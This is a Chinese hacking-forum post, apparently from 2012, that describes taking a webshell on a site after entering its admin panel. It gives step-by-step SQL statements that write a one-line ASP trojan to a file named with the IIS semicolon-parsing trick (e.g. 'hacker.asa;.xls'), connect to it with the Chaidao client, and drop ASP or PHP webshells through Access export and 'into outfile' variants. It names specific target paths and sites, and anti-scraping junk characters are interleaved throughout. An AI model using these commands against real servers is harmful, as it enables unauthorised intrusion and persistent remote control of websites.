好不容易进了后台,发现啥上传啊。备份啊多木有。
; ?7 ]/ S% a- Iwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
2 x# t. j+ D2 N* T! m) Z x$ F7 B文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
9 n. o4 I7 Z( Q# m然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:* B9 r7 P# n& t Y- e
1.create table cmd (a varchar(50))
h' x) _+ {, d& M2 p1 C2.insert into cmd (a) values (‘‘)& d% E' B+ w! l
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
4 Q" Q8 G$ `9 o% U: f- g(把表cmd的内容导出为物理路径的一个EXCEL文件)
6 {" h& z# m3 H* k+ i4.drop table cmd! U/ \8 j9 E3 L7 H1 b5 o. E
利用IIS的BUG成功拿到了WEBSHELL。1 z7 p+ K5 d1 q {( D* k
- s" a# X( S- {
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话4 j& ~* M7 c. G, W
: R* n) e6 E9 e5 L0 L- S SQL语句意思解释:+ k4 E' ]' X" R% m( R1 c# ?2 u
第一句; m# Q& {9 ^5 K- Y. k, Z# K
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 j+ [9 v+ T" p/ D# G; ]
7 A6 N+ Y; g! W! h' p 第二句
( `3 I0 J0 p1 I. R R9 C 在表cmd的a字段插入一句话木马
6 X: o9 h" {0 ]& w 第三句
9 P- W8 u" `7 D1 g1 i1 B" _2 p- s 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
/ S- ]' u" I- _9 K7 g7 V: O3 a' }# [% K! a" z% |, X9 g
第四句
0 p( b& z3 P7 r# u0 i- }5 e 删除建立的cmd表6 \. }& ~4 n/ c, Y% w5 }' \9 W
$ A/ n/ }0 c! N- Q
以下内容为测试:
3 ]4 t& Y' A( K2 M: m1 Z4 ]" z Access利用后台SQL执行命令功能导出WebShell:, X5 r5 v8 o$ j% C# J; Z
这个更简单:
* J; X( B/ W+ U4 t, @( H6 i [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]5 J! z/ D. {1 M: A a% l9 _
或者+ g0 z% R- V" |- _ C8 H
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
2 e& |) O. |6 P5 ^- M; w
% U2 L+ |' S& p* U/ o7 C 后台有执行SQL语句功能(vote为已知表段), a& P; k. h [ U8 i6 f
希望对大家有所帮助拿shell的又一个思路
2 ~8 f# T9 B! f) Z {1 d: [& [ |
发表于 2012-9-13 17:53:58
收藏
支持
反对